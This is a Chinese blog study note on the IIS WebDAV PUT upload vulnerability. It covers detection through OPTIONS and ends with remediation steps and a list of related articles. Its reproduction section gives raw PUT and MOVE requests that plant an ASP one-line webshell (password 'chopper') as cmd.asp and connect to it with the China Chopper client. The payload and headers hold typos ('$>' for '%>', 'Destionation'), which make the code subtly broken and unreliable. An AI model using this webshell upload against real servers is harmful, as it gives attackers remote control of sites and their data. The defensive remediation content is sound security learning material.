IIS put上传漏洞

最新推荐文章于 2024-06-22 17:29:20 发布
最新推荐文章于 2024-06-22 17:29:20 发布
阅读量1.4k 收藏 4
点赞数 1
分类专栏: web基础笔记 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dqd66/article/details/127374425
版权

IIS put上传漏洞
    IIS是windows系统自带的web中间件 通过它可以搭建网站
    不满足现有功能 开发了WebDAV用于拓展HTTP方法
  导致HTTP支持PUT相关方法,导致IIS上传漏洞 用户可以向指定目录上传任意文件

    IIS Put 上传漏洞前提 :1,IIS开启WebDAV
                2. IIS用户对上传目录具有写权限

 漏洞检测
    使用HTTP协议中的OPTIONS请求方法 
        会在返回的 Allow 消息头中,包含 PUT,MOVE,COPY 可能存在IIS PUT上传漏洞


复现漏洞
     1.上传(使用PUT方法 上传文本文件 1.txt)
     脚本到网站目录下
    PUT /1.txt HTTP/1.1
    Host:  192.168.1.1
    Content-length:  27
    
    <%eval request("chopper")$>
        //chopper是密码

     2.更改后缀(使用copy或者move方法 将上传好的文本文件复制到cmd.asp 中 然后使用中国菜刀连接)
    MOVE /1.txt HTTP/1.1
    Host:   192.168.1.1
    Destionation:   http://192.168.1.1/cmd.asp


    3.打开菜刀
    单击右键 添加
    地址:http://192.168.1.1/cmd.asp     密码 chopper

    

修补漏洞
1.关闭WebDVA
2,设置ISAPI筛选器Urlscan 取消对PUT方法的支持
3,设置站点目录权限,是的IIS用户不具有写入权限

@pon
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【实战系列3】IIS PUT文件上传漏洞GetShell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-10 2314
IIS(Internet Information Services)PUT文件上传漏洞是一种安全漏洞,影响微软的IIS服务器。它允许攻击者通过HTTP PUT请求上传任意文件到服务器上,从而可能导致恶意文件的上传和执行,可能引发远程代码执行攻击,导致服务器被攻陷。
IIS网站漏洞利用
m0_46559879的博客
04-19 2251
网站漏洞利用 网站后台绕过 1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。 2、尝试使用弱密码登录系统,观察登陆界面给出的反馈。 3、输入一些特殊字符,如‘’/±=等,点击登录,观察系统反馈。 4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。 5、进入网站后台管理界面。 一般网站的后台地址为http://192.168.167.84<font color="blue">/admin 或/login</font> 一般网站默认用户名和密码为:
IIS6.0 put文件上传GetShell
good good study
05-24 2144
IIS服务器开启了webdav服务扩展,又设置了来宾账户对web目录拥有写入权限时,可以被恶意攻击者利用,直接上传恶意文件。
复现IIS PUT任意上传漏洞(过程,步骤,说明)
XZ_______的博客
12-20 2296
环境搭建: 一台Windows server 2003 r2 主机,装有IIS6.0 将nc、IISPutScanner、桂林老兵工具上传到靶机 步骤: 将iis里面的web服务扩展配置一下,配置如图下 然后将主目录的权限开一下 进入桌面打开nc.exe程序:输入如下参数 然后打开IISPutScanner.exe输入ip地址端口号然后scan 创建一个文本输入一句话木马 然后将主目录的来宾账户的写入和读取权限打开 然后打开桂林老兵使用PUT传入1.txt 然后将PUT改为MOVE将后缀名改为
文件上传漏洞-下篇
最新发布
Varin
06-22 907
文件上传漏洞可以说是日常渗透测试中用得最多的一个漏洞,用它获得服务器权限最快最直接。在web程序中,经常需要用到文件上传的功能。如用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。如果上传了可执行文件或者网页脚本,就会导致网站被控制基至服务器论陷。,复杂一点的情况是配合webserver的解析漏洞来获取控制权或结合文件包含漏洞
文件上传IIS—put漏洞
一个普普通通的博客
03-16 4630
iis—put漏洞
IIS-PUT文件上传漏洞
2301_77315080的博客
10-17 719
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞IIS,此漏洞主要是因为服务器开启了WebDAV的组件导致的可以扫描到当前的操作,具体操作其实是通过WebDAV的OPTIONS来查询是否支持PUT。根据put协议,当我们浏览某个网站,访问某个资源时,如果网站存在这个资源,则会进行替换,若网站不存在这个资源,则会创建这个资源,所以我们可以利用put直接对网站写shell。上的文件夹,该扩展也存在缺陷,可以被恶意攻击者利用,直接上传恶意文件。
[WEB安全]IIS-PUT漏洞
baguangman5501的博客
08-03 819
目录 0x00 IIS简介 0x01 Put漏洞造成原因 0x02 实验环境搭建 0x03 需要用到的工具 0x04 IIS-PUT漏洞演示实战 0x05 常见请求协议 0x06 漏洞修复建议 0x00 IIS...
IIS-PUT上传漏洞
swordheart的博客
11-30 3718
IIS-PUT上传漏洞 IIS Server 在 Web 服务扩展中开启了 WebDAV ,网站配置了可以写入的权限,造成任意文件上传。影响版本6.0 包括配置了脚本资源访问的权限 使用burpsuite 进行测试,先PUT上传1.txt的asp的一句话 本来put上传后的状态码应该是201,由于服务器已经put上传了1.txt,所以返回的状态码为200 然后通过copy或者move方法复制或移动到指定123.asp文件当中去。 当然Destination这个是指定你创建的asp
IIS各版本报出来的漏洞
热门推荐
anlalu233的博客
10-18 1万+
IIS3.0
IISPUT漏洞扫描器
10-03
IISPUT漏洞,全称为Microsoft IIS PUT上传漏洞,是由于微软Internet Information Services(IIS)服务器在处理PUT请求时的一个安全缺陷。这个漏洞在2003年前后被发现,主要是由于IIS服务器在某些情况下允许未经授权...
iisputscaner.zip
01-11
这款扫描器的主要目标是发现并报告IIS服务器上可能存在的PUT方法漏洞,PUT方法是HTTP协议中的一个请求方法,允许客户端将数据上传到服务器的指定位置。PUT漏洞通常会导致服务器被恶意用户利用,进行未授权的数据写入...
iisputscaner
12-04
IISPUTScanner是一款专门针对IIS(Internet Information Services)服务器的安全扫描工具,它主要用于检测服务器是否允许不安全的HTTP方法,例如PUT,这可能导致恶意用户利用此漏洞上传恶意脚本,即所谓的"getshell...
IISPutScanner增强版.rar
03-02
IISPutScanner通过模拟PUT请求,对服务器的每个目录进行扫描,检查是否可以成功上传文件,从而揭示潜在的漏洞。 增强版的IISPutScanner可能包含以下特性: 1. **深度扫描**:扫描更多的目录和文件类型,不仅仅局限...
IISPutScanner
02-03
2. **安全评估**:通过对服务器的读写权限进行全面检查,IISPutScanner可以帮助管理员识别那些过于开放的权限设置,防止恶意用户利用这些漏洞。 3. **报告生成**:在扫描完成后,工具会生成详细的报告,列出所有...
任意文件上传
cgjil的博客
09-09 494
通过Web 方式,使用HTTP| HTTPS 协议传递命令消息到服务器,并且继承了Web 用户的权限,在服务器上远程执行命令。Web 应用开放了文件上传功能,没有对上传的文件做足够的限制和过滤。WebShell 接收来自于Web 用户的命令,然后在服务器端执行,也称为网站木马、木马后门、网马等。上传文件重命名,尽量少的从客户端获取信息,包括文件名、文件类型、文件内容等;通过恶意文件,利用其他漏洞拿到管理员权限(提权),导致服务器沦陷。Web 服务器开启文件上传功能,Web 用户可以使用该功能。
Tomcat中间件PUT漏洞-任意文件上传漏洞
weixin_46411728的博客
08-11 707
Tomcat中间件PUT任意文件上传漏洞
IIS PUT漏洞
weixin_48182463的博客
10-17 384
根据put协议,当我们浏览某个网站,访问某个资源时,如果网站存在这个资源,则会进行替换,若网站不存在这个资源,则会创建这个资源,所以我们可以利用put直接对网站写shell。而IIS Server 如果在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,结合put协议就会造成任意文件上传漏洞
IIS webapi允许 put delete等请求
我笔记
09-08 1019
调试的时候是可以使用put请求的,后面部署到IIS上面的使用旧提示报错了。 原因是IIS默认是不支持put和delete的请求的,要想IIS支持,则需要进行如下两个步骤。 1、删除自己项目下的IIS安装的WebDav模块 2、修改你项目的web.config ,在<system.webServer>标签内加上以下代码。 <modules> <remove name="WebDAVModule"/> <
IIS6.0中间件解析漏洞与PUT上传技术解析
而Burp Suite是一款强大的Web应用安全测试套件,可以方便地进行OPTIONS探测、PUT上传、文件移动和删除等操作,从而深入测试IIS6.0的PUT上传漏洞。 了解这些概念对于网络安全专业人员至关重要,因为他们需要识别并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@pon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值